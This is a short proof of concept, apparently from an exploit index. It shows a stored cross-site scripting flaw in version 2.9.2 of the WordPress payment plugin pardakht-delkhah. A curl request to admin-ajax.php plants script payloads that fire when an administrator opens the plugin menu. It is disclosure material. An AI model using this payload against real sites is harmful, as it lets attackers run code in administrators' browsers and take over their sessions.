## https://sploitus.com/exploit?id=WPEX-ID:4000BA69-D73F-4C5B-A299-82898304CEBB
1. Install and activate WoocCommerce (dependency, no configuration required)
2. Install the vulnerable plugin (pardakht-delkhah 2.9.2)
3. Under plugin's menu, "Custom payment" > "Gateway Settings", hit the save button to set the default gateway.
4. Invoke the following curl request to store two XSS payloads (both of which will trigger an alert box:
curl http://localhost:10008/wp-admin/admin-ajax.php \
--data 'action=cupri_action&cupri_fmobile=981111111111&cupri_fprice="><script>alert(`xss1`)</script>&cupri_f0="><script>alert(`xss2`)</script>'
5. The XSS will be triggered when an admin navigates to the plugin's menu (/wp-admin/edit.php?post_type=cupri_pay)